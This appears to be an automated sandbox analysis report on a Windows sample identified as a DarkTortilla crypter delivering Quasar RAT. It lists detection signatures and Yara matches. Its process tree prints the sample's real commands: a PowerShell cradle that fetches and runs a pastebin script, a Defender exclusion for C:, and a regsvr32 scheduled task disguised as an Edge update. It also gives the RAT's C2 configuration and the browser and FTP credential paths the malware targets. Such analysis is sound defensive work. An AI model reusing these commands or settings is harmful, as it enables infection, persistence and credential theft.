Edit tour

Windows Analysis Report
lO5lV39HDj.exe

Overview

General Information

Sample name:	lO5lV39HDj.exe renamed because original name is a hash value
Original sample name:	3fef4a4f7dc07057e6a500935782161219440423b7fd02e269e2c8d14c443288.exe
Analysis ID:	1607152
MD5:	afe55a1184d9f188557f9b1356198d7b
SHA1:	d352a43ed4fbff47e693f889d56235f35eb7717a
SHA256:	3fef4a4f7dc07057e6a500935782161219440423b7fd02e269e2c8d14c443288
Tags:	89-23-99-249exeuser-JAMESWT_MHT
Infos:

Detection

DarkTortilla, Quasar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: Powershell launch regsvr32

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected DarkTortilla Crypter

Yara detected Quasar RAT

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Uses Register-ScheduledTask to add task schedules

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

lO5lV39HDj.exe (PID: 7924 cmdline: "C:\Users\user\Desktop\lO5lV39HDj.exe" MD5: AFE55A1184D9F188557F9B1356198D7B)

powershell.exe (PID: 8092 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

csc.exe (PID: 1412 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 6328 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5891.tmp" "c:\Users\user\AppData\Local\Temp\0nzyxcux\CSC9B1D91995BDA47B39210566D4DA539B4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 6444 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

BT.exe (PID: 8168 cmdline: "C:\Users\user\Downloads\BT.exe" MD5: A2F9781E42A8DA5EB3CBE8A4DBA009E6)

BT.tmp (PID: 7196 cmdline: "C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp" /SL5="$F001C,2956477,245248,C:\Users\user\Downloads\BT.exe" MD5: 70FCEDD0D46D1C97AF8E3EB4868C5BF1)

BT.exe (PID: 8120 cmdline: "C:\Users\user\Downloads\BT.exe" /VERYSILENT MD5: A2F9781E42A8DA5EB3CBE8A4DBA009E6)

BT.tmp (PID: 1836 cmdline: "C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp" /SL5="$401C6,2956477,245248,C:\Users\user\Downloads\BT.exe" /VERYSILENT MD5: 70FCEDD0D46D1C97AF8E3EB4868C5BF1)

regsvr32.exe (PID: 3096 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 2224 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 2228 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5112 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{05493815-7F3D-43AF-9EBD-81B00854A622}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ST.exe (PID: 2220 cmdline: "C:\Users\user\Downloads\ST.exe" MD5: 69FAF96407C407A1BF211BE76F919BBF)

AddInProcess32.exe (PID: 5576 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

regsvr32.exe (PID: 5048 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 5680 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
Quasar RAT, QuasarRAT	Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.	APT33 Dropping Elephant Stone Panda The Gorgon Group	http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848 https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf https://asec.ahnlab.com/en/31089/	https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "185.147.124.146:4782;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "70595b2f-92ed-4cab-b358-5e9c155366b4", "StartupKey": "Quasar Client Startup", "Tag": "svchost32", "LogDirectoryName": "Logs", "ServerSignature": "QWTAPU96ZD4B5rzcGsMZTmvJMYuru/pfm79y1lQKhDBqJ8jx72Ry12Gq8DyaOAUJRkBMOVbj+C53qNTcsC2Xbz/001/c0K/zi6nNfZB/JdnTjxc647UWHBw7IsaYgClvWlQPN6ZPeVcgasY701EfnaEyYpSjRQKxfXndFerz6MOERmXY3cmfUfjHR3yqTOkqesdcctAVr+PV4tPO3KYdfQhy6P+vW4RzlDemRKwAVmcHM4xz43NiKNu0cw1fJ/N1PwkaT21Di+Cu9uZZPyuzilwa4yV9XvLQvAi5M0jwtfOfTDbeoBnPboldK3Dz0KHCC64BCiFThbUps6K1z6/XDP+bllDhMGLxu8SLcPzGsbb4yOzgW2dbnDT7aNbPVTXjefAx2A7hPyfGJGfNptkN0Gs52cV/FLy4VGMh9O6Wo04gneYRJ6h3yr9rvU1NjLPIx/3b0O9F9S3SEcVwW69SuWmrQsaBUYPdS1xhJVf7HyyQMX2ZckAwZxwNuz9kYEB72R8FyySQ/FWonv+jE7jDcEZWA2KlGBjfn35PqNLuoPLljsSs9YIrfE9Wm521NwIVHoi1kBvpxVt6IzCrmjauj/ayt9HF7R3mTtTedD7UZlE3vp80EYGCg2W8RQkjHlNygD0s2Lyr24+/fxxwW13ZjLs/U1W3M+3RvMnqcVQiI+E=", "ServerCertificate": "MIIE9jCCAt6gAwIBAgIQAKCGorTxUxixTgWTfRLobzANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFQaGFudG9tIFNlcnZlciBDQTAgFw0yNTAxMjIxNDE1MTZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRUGhhbnRvbSBTZXJ2ZXIgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDBroHhM07SjKOMLI9aSIowOMoinGujkAsuPsMTcg2C/x4EDyjfNz6fdFiBb8k7lBAMsKDsW4etU8CMhXxFox4HL3bBGUKQnb1ttQUO9Q9okkvN9J8SmxMX4rm7tgu91V9gxcvp0BkxTE2haYQVy/f9YMYooDc1gPD2KXUPlsRbEE6dwj9b0Inlo4a84FlXSbpcEWmqxBmfCVkLHuNC/e9T3LajN6EhSthfCr9CNt0YoSJMBVOCxvomKCYqJP23tIhq3I74rCIwPZT/mi9R8hMf7qgvgbhqL6/ngQw1lB3bLYN3mlATUbmuQOcijAa8OiusfXDYevIB1h4hGfd2gxxGQkcwtiG3SMoz6rPI6ms9jHxmvwcms29rMKmoBw/HYOLJEjMMN2Iyo/Kqlk2tRbNLQp8/MBQSyP73+M8SyuC0bSHakND2dmQUoDtk0GYgR1sL2LOA8s+lRQtLHFCgywoTzlJ7F/yGWbW1/V9YV4VQr5Zy0Tp9rLQzavTruhuSQklVAACLE5jadmRo4CrY4Gbo++Brd0NK3OU3MqwatmUS8L9k7E6VjxVNySvoBMHsYZYywH37njhiyAM1txCgx2NS8Qo7wBrwZWZN8JdTrJpslVn45aUdsv02MWnSEdi8TspUFjRMLlovpMIdPzNKDy3/tVWefTjx6Rz2u1YLnJ09ZQIDAQABozIwMDAdBgNVHQ4EFgQUKBmnQWPxQPRDYfUKSkc8q2ExyVswDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAiUke+gZyNUAi7CQpI/iTtoAhZUOKn8ViGYeWAblZmht+zi4HKehfi7RtzawmNEbPJd8MbDrpRvyuaC34XQlpp/BAeAZkdC+Uhn39O/yzceokcwCt487h/C93DhR7v7ASk1QaCdEnqZdPIwM7WaqozghtKox5zKWcK12R1OqAEXhWdA2jyqRBx4ooGCqQJOWvKbarpp6o17wqime0VI50MInWxRpGAkJvxEeQhoqG2/xUTRfWOzjFVcOGDpFTU/BLcWnfzB5sw1RjM7IbCv3W8sYkd4C3sqgGvsKyjH9Nj6lC9CKXz1PhlDCWtY79bf6enfo1P0jkqT5dBhtunIiCyuI840CVbqsrqGyT6XpfYOEx6dji9dJiFY5tddR1OQFelmLTs/PMALa6cLN4SFsR087wtRUG+L+SV+BtBkoo1dsLboARgAlrmbtv1CpQBl9opgzAX1bz/NvnoVx5y+KkAIDgR8xhWDbMPzj6mn2NLYlSSEtA4JHfxTZVPG7PhXq3yAHB5xt914TYuGcMaONyIJsX33OiLte2GunTNLlZtkf/2g8o4ifJBMN5o2SCgkfbeaMKm3WmqSo5pxG19wy31NSm04ckOJ3Gn7+tKd2nIJLWo0Tc3Da9e/N/8PK4LpMEF3PltlKWGifhfGa5Yo8iGC1bQ2aZq/dcikTBn8CHj5s="}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000002.2603458986.00000000063F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000014.00000002.2550460561.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000011.00000002.2540192670.0000000002FA8000.00000040.00000020.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000011.00000002.2541753861.0000000003831000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000011.00000002.2541753861.0000000003C12000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ef4c:$x1: Quasar.Common.Messages 0x29f275:$x1: Quasar.Common.Messages 0x2ab7fe:$x4: Uninstalling... good bye :-( 0x2acff3:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadb0:$f1: FileZilla\recentservers.xml 0x2aadf0:$f2: FileZilla\sitemanager.xml 0x2aae32:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab07e:$b1: Chrome\User Data\ 0x2ab0d4:$b1: Chrome\User Data\ 0x2ab3ac:$b2: Mozilla\Firefox\Profiles 0x2ab4a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd42c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab600:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ba:$b5: YandexBrowser\User Data\ 0x2ab728:$b5: YandexBrowser\User Data\ 0x2ab3fc:$s4: logins.json 0x2ab132:$a1: username_value 0x2ab150:$a2: password_value 0x2ab43c:$a3: encryptedUsername 0x2fd370:$a3: encryptedUsername 0x2ab460:$a4: encryptedPassword 0x2fd38e:$a4: encryptedPassword 0x2fd30c:$a5: httpRealm
00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab8e8:$s3: Process already elevated. 0x28ec4b:$s4: get_PotentiallyVulnerablePasswords 0x278d07:$s5: GetKeyloggerLogsDirectory 0x29e9d4:$s5: GetKeyloggerLogsDirectory 0x28ec6e:$s6: set_PotentiallyVulnerablePasswords 0x2fea5a:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
00000011.00000002.2539716605.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000011.00000002.2543209302.0000000013831000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: regsvr32.exe PID: 2224	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.ST.exe.63f0000.5.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
20.2.ST.exe.63f0000.5.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
17.2.regsvr32.exe.1c3f0000.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
17.2.regsvr32.exe.1c3f0000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.regsvr32.exe.1c3f0000.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ef4c:$x1: Quasar.Common.Messages 0x29f275:$x1: Quasar.Common.Messages 0x2ab7fe:$x4: Uninstalling... good bye :-( 0x2acff3:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
17.2.regsvr32.exe.1c3f0000.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadb0:$f1: FileZilla\recentservers.xml 0x2aadf0:$f2: FileZilla\sitemanager.xml 0x2aae32:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab07e:$b1: Chrome\User Data\ 0x2ab0d4:$b1: Chrome\User Data\ 0x2ab3ac:$b2: Mozilla\Firefox\Profiles 0x2ab4a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd42c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab600:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ba:$b5: YandexBrowser\User Data\ 0x2ab728:$b5: YandexBrowser\User Data\ 0x2ab3fc:$s4: logins.json 0x2ab132:$a1: username_value 0x2ab150:$a2: password_value 0x2ab43c:$a3: encryptedUsername 0x2fd370:$a3: encryptedUsername 0x2ab460:$a4: encryptedPassword 0x2fd38e:$a4: encryptedPassword 0x2fd30c:$a5: httpRealm
17.2.regsvr32.exe.1c3f0000.3.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab8e8:$s3: Process already elevated. 0x28ec4b:$s4: get_PotentiallyVulnerablePasswords 0x278d07:$s5: GetKeyloggerLogsDirectory 0x29e9d4:$s5: GetKeyloggerLogsDirectory 0x28ec6e:$s6: set_PotentiallyVulnerablePasswords 0x2fea5a:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
17.2.regsvr32.exe.2fa92de.1.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
17.2.regsvr32.exe.2fa92de.1.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d14c:$x1: Quasar.Common.Messages 0x29d475:$x1: Quasar.Common.Messages 0x2a99fe:$x4: Uninstalling... good bye :-( 0x2ab1f3:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
17.2.regsvr32.exe.2fa92de.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8fb0:$f1: FileZilla\recentservers.xml 0x2a8ff0:$f2: FileZilla\sitemanager.xml 0x2a9032:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a927e:$b1: Chrome\User Data\ 0x2a92d4:$b1: Chrome\User Data\ 0x2a95ac:$b2: Mozilla\Firefox\Profiles 0x2a96a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb62c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a9800:$b4: Opera Software\Opera Stable\Login Data 0x2a98ba:$b5: YandexBrowser\User Data\ 0x2a9928:$b5: YandexBrowser\User Data\ 0x2a95fc:$s4: logins.json 0x2a9332:$a1: username_value 0x2a9350:$a2: password_value 0x2a963c:$a3: encryptedUsername 0x2fb570:$a3: encryptedUsername 0x2a9660:$a4: encryptedPassword 0x2fb58e:$a4: encryptedPassword 0x2fb50c:$a5: httpRealm
17.2.regsvr32.exe.2fa92de.1.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9ae8:$s3: Process already elevated. 0x28ce4b:$s4: get_PotentiallyVulnerablePasswords 0x276f07:$s5: GetKeyloggerLogsDirectory 0x29cbd4:$s5: GetKeyloggerLogsDirectory 0x28ce6e:$s6: set_PotentiallyVulnerablePasswords 0x2fcc5a:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
17.2.regsvr32.exe.13839ac0.2.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
17.2.regsvr32.exe.13839ac0.2.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d14c:$x1: Quasar.Common.Messages 0x29d475:$x1: Quasar.Common.Messages 0x2a99fe:$x4: Uninstalling... good bye :-( 0x2ab1f3:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
17.2.regsvr32.exe.13839ac0.2.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8fb0:$f1: FileZilla\recentservers.xml 0x2a8ff0:$f2: FileZilla\sitemanager.xml 0x2a9032:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a927e:$b1: Chrome\User Data\ 0x2a92d4:$b1: Chrome\User Data\ 0x2a95ac:$b2: Mozilla\Firefox\Profiles 0x2a96a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb62c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a9800:$b4: Opera Software\Opera Stable\Login Data 0x2a98ba:$b5: YandexBrowser\User Data\ 0x2a9928:$b5: YandexBrowser\User Data\ 0x2a95fc:$s4: logins.json 0x2a9332:$a1: username_value 0x2a9350:$a2: password_value 0x2a963c:$a3: encryptedUsername 0x2fb570:$a3: encryptedUsername 0x2a9660:$a4: encryptedPassword 0x2fb58e:$a4: encryptedPassword 0x2fb50c:$a5: httpRealm
17.2.regsvr32.exe.13839ac0.2.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9ae8:$s3: Process already elevated. 0x28ce4b:$s4: get_PotentiallyVulnerablePasswords 0x276f07:$s5: GetKeyloggerLogsDirectory 0x29cbd4:$s5: GetKeyloggerLogsDirectory 0x28ce6e:$s6: set_PotentiallyVulnerablePasswords 0x2fcc5a:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
17.2.regsvr32.exe.13839ac0.2.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
17.2.regsvr32.exe.13839ac0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.regsvr32.exe.13839ac0.2.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ef4c:$x1: Quasar.Common.Messages 0x29f275:$x1: Quasar.Common.Messages 0x2ab7fe:$x4: Uninstalling... good bye :-( 0x2acff3:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
17.2.regsvr32.exe.13839ac0.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadb0:$f1: FileZilla\recentservers.xml 0x2aadf0:$f2: FileZilla\sitemanager.xml 0x2aae32:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab07e:$b1: Chrome\User Data\ 0x2ab0d4:$b1: Chrome\User Data\ 0x2ab3ac:$b2: Mozilla\Firefox\Profiles 0x2ab4a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd42c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab600:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ba:$b5: YandexBrowser\User Data\ 0x2ab728:$b5: YandexBrowser\User Data\ 0x2ab3fc:$s4: logins.json 0x2ab132:$a1: username_value 0x2ab150:$a2: password_value 0x2ab43c:$a3: encryptedUsername 0x2fd370:$a3: encryptedUsername 0x2ab460:$a4: encryptedPassword 0x2fd38e:$a4: encryptedPassword 0x2fd30c:$a5: httpRealm
17.2.regsvr32.exe.13839ac0.2.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab8e8:$s3: Process already elevated. 0x28ec4b:$s4: get_PotentiallyVulnerablePasswords 0x278d07:$s5: GetKeyloggerLogsDirectory 0x29e9d4:$s5: GetKeyloggerLogsDirectory 0x28ec6e:$s6: set_PotentiallyVulnerablePasswords 0x2fea5a:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
17.2.regsvr32.exe.2bd12ae.0.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
17.2.regsvr32.exe.2bd12ae.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
